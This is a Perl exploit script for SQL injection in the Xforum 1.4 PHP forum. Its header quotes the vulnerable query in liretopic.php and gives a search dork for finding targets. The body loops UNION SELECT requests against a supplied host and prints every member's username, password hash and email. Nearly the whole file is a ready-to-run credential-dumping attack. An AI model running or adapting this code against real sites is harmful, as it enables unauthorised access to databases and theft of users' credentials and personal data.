#!/usr/bin/perl ####################################################### # # Xforum 1.4 Remote SQL Injection # desc: Un forum php/MySQL, avec gestion complete des membres et des messages # download: http://www.comscripts.com/scripts/php.xforum.1188.html # d0rk: "xforum 1.4" # bug found by j0j0 # c0ded by j0j0 # # liretopic.php # 68. $conn = connect(); # 69. $requete = "SELECT titre,closed,place,cara FROM topic WHERE numero=".$_GET['topic']." AND categorie=".$_GET['categorie']; # 70. $res = mysql_query($requete) or die(mysql_error()); # 71. $proptopic = mysql_fetch_row($res); # ####################################################### use LWP::UserAgent; use HTTP::Request::Common; $lwp = new LWP::UserAgent; $host = $ARGV[0]; print q{ ---------------------------------------------- .: Xforum 1.4 Remote SQL Injection :. ---------------------------------------------- c0ded by: j0j0 download: http://www.comscripts.com/scripts/php.xforum.1188.html desc: Un forum php/MySQL, avec gestion complete des membres et des messages d0rk: "xforum 1.4" ---------------------------------------------- }; if(!$ARGV[0]) { print "[*] Usage: perl $0 [HOST]\n"; print "[*] Example: perl $0 http://mysite.com/forum\n"; exit(1); } print "\n[*] Connecting to $host...\n"; $i=0; while(true) { $go=$lwp->get($host."/liretopic.php?categorie=1&topic=-1/**/UNION/**/SELECT/**/CONCAT(0x21232321,pseudo,char(58),pass,char(58),mail,0x21232321),1,2,3/**/FROM/**/inscrit/**/LIMIT/**/$i,100000/**//*&nbpage=1&nbpageliste=1"); if($go->content =~ m/!##!(.*?)!##!/ms) { @res = split(/:/, $1); $res[1] = substr($res[1], 0, 32); print "\n[+] Username : $res[0]\n"; print "[+] Password : $res[1]\n"; if($res[2] =~ /(.*?)@(.*?)/) { print "[+] Mail : $res[2]\n"; } $i++; } else { if($i == 0) { print "[-] Exploit failed\n"; } exit(1); } }